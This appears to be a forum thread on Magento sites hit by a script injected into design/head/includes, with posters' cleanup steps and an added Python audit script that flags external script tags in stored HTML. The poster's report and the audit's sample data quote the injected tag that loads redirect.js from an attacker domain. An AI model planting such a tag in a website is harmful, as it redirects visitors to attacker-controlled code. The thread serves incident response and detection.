Website started redirecting to another URL

I found the injected code in the core_config_data table, under design/head/includes. Removed it and now the site is back to normal.

UPDATE: As everyone else mentioned, it happened again this morning. This time I got rid of it more easily from the Admin Panel under System > Configuration > General > Design > HTML Head > Miscellaneous Scripts. This is a huge vulnerability, I hope Magento is working on a patch.

UPDATE 2: The script came back again, so I changed the db password, cleared cache. About an hour later, the script is back. So I don't think it's being added through the db. I just changed my admin password, let's see if it comes back again.

UPDATE 3: Since I changed the admin password yesterday on both of my affected sites, about 24 hours later both are still clean.


Same issue on another Magento site. I discovered that a script is injected in the HEAD section of the page, requesting redirect_base/redirect.js from melissatgmt.us (then changed to another domain) but I can't figure out how this shit is injected.

UPDATE: As mentioned by others, I found the entry in the core_config_data table and removed it, but the record was back at the next page reload. I changed the db password and now it seems to be defeated. I'm not sure the password change is the ultimate solution, but anyway it is a security improvement.

UPDATE 2: As stated by Jix Sas, accessing from config in Magento administration is an easier solution than directly accessing the database table. But the shit keeps coming back every 10/15 minutes.

UPDATE 3: Changed admin password, checked & saved some CMS pages (customer-service and about-us) that seemed to be somehow infected, disabled cache, cleaned cache several times (after every check & save of an 'infected' CMS page); no more script injected during the past 8 hours.
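
Added example, not part of any of the posts above: a Python check that scans stored HTML (the design/head/includes value and CMS page content mentioned in the answers) for script tags loading from hosts outside an allowlist, so a reinjection is noticed without opening the site. The location labels, the allowlist host cdn.shop.example and the sample values are constructed assumptions; feed it rows exported from your own database.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class ScriptCollector(HTMLParser):
    """Collect <script src> values and count inline <script> blocks."""
    def __init__(self):
        super().__init__()
        self.sources, self.inline = [], 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())
            else:
                self.inline += 1

def audit_value(value, allowed_hosts):
    """Return reasons why this stored HTML needs review (empty list = clean)."""
    parser = ScriptCollector()
    parser.feed(value or "")
    parser.close()
    reasons = []
    for src in parser.sources:
        host = (urlparse(src).hostname or "").lower()  # also handles //host/path
        if host and host not in allowed_hosts:
            reasons.append("external script from " + host)
    if parser.inline:
        reasons.append("%d inline script block(s)" % parser.inline)
    return reasons

def audit_rows(rows, allowed_hosts):
    """rows: (location, value) pairs. Returns {location: reasons} for flagged rows."""
    flagged = {loc: audit_value(val, allowed_hosts) for loc, val in rows}
    return {loc: why for loc, why in flagged.items() if why}

# Constructed sample rows (not real site data), shaped like values exported from
# core_config_data (path design/head/includes) and from CMS page content.
SAMPLE_ROWS = [
    ("core_config_data:design/head/includes",
     '<script src="//melissatgmt.us/redirect_base/redirect.js"></script>'),
    ("cms_page:about-us", '<p>About us</p><script src="/js/local.js"></script>'),
    ("cms_page:customer-service",
     '<h1>Help</h1><script src="https://cdn.shop.example/widget.js"></script>'),
]
ALLOWED = {"cdn.shop.example"}  # assumption: hosts the shop loads scripts from on purpose

if __name__ == "__main__":
    for location, reasons in audit_rows(SAMPLE_ROWS, ALLOWED).items():
        print(location, "->", "; ".join(reasons))
```

Inline script blocks are reported for manual review rather than treated as malicious, since legitimate tracking snippets also live in Miscellaneous Scripts.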


I changed the path to the admin panel in app/etc/local.xml and it helps. The script is no longer added to design/head/includes.

Explanation:

In app/etc/local.xml I changed

    <admin>
        <routers>
            <adminhtml>
                <args>
                    <frontName><![CDATA[new_admin_path]]></frontName>
                </args>
            </adminhtml>
        </routers>
    </admin>

Previously it was sitedomain.com/admin, and now the path to the admin panel will be sitedomain.com/new_admin_path